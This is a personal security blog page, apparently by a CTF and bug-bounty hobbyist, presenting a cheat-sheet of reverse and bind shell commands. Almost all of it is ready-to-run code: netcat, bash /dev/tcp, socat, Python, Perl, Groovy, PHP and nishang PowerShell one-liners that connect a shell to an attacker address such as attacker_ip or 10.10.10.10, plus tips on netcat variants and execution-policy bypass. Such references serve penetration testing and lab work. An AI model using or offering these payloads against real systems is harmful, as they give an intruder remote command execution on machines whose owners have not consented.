f4d3

InfoSec enthusiast | pwn | RE | CTF | BugBounty

Shells Cheat-Sheet

What's here?

  • Some essential code snippets. :smile:

General

netcat

Reverse shell:

nc attacker_ip port -e /bin/sh

Bind shell:

nc -lvp port -e /bin/sh

Note: -e only exists in some netcat builds (nc.traditional, ncat); the OpenBSD netcat shipped by many distros has no -e, so there you have to wire the shell to the socket through a named pipe (mkfifo) instead.

bash - reverse shell (uses bash's /dev/tcp pseudo-device, so run it under bash, not sh):

bash -i >& /dev/tcp/10.10.10.10/9999 0>&1

socat - reverse shell (gives a full pty on the listener side: tab completion, Ctrl-C, etc.):

on listener:

socat file:`tty`,raw,echo=0 tcp-listen:9001

on victim:

socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:9001

python - reverse shell:

One liner:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Same but prettier:

	import socket
	import subprocess
	import os

	# connect back to the listener
	s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
	s.connect(("10.0.0.1",1234))
	# point stdin, stdout and stderr at the socket
	os.dup2(s.fileno(),0)
	os.dup2(s.fileno(),1)
	os.dup2(s.fileno(),2)
	# spawn an interactive shell on those descriptors
	p=subprocess.call(["/bin/sh","-i"])

perl - reverse shell:

perl -e 'use Socket;$i="10.10.10.10";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Same but prettier:

use Socket;
$i="10.0.0.1";
$p=1234;
socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));
if(connect(S,sockaddr_in($p,inet_aton($i)))){
  open(STDIN,">&S");
  open(STDOUT,">&S");
  open(STDERR,">&S");
  exec("/bin/sh -i");
};

Java (Groovy syntax, e.g. for a Jenkins script console; in plain Java build the argument array with new String[]{...}):

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/9999;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

php - reverse shell:

php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

This assumes the socket lands on file descriptor 3, which is the case under php -r; inside a web server the process may already have more descriptors open, so try 4, 5, 6 ... if 3 doesn't work.

Powershell (bind and reverse shells) - nishang:

Copy nishang's Invoke-PowerShellTcp.ps1 and append the invocation you want as its last line. For example, for a bind shell:

copy Invoke-PowerShellTcp.ps1 bindtcp.ps1

Add at the end of bindtcp.ps1:

echo "Invoke-PowerShellTcp -Bind -Port 4444" >> C:\path\to\the\bindtcp.ps1

For a reverse shell append "Invoke-PowerShellTcp -Reverse -IPAddress attacker_ip -Port 4444" instead.

Execute it!

powershell.exe -exec bypass -f "C:\path\to\the\bindtcp.ps1"

(-exec bypass only skips the execution policy; it does nothing about AV or AMSI.)

Check the comments inside the nishang .ps1 for more info :smile:

updated_at 07-05-2020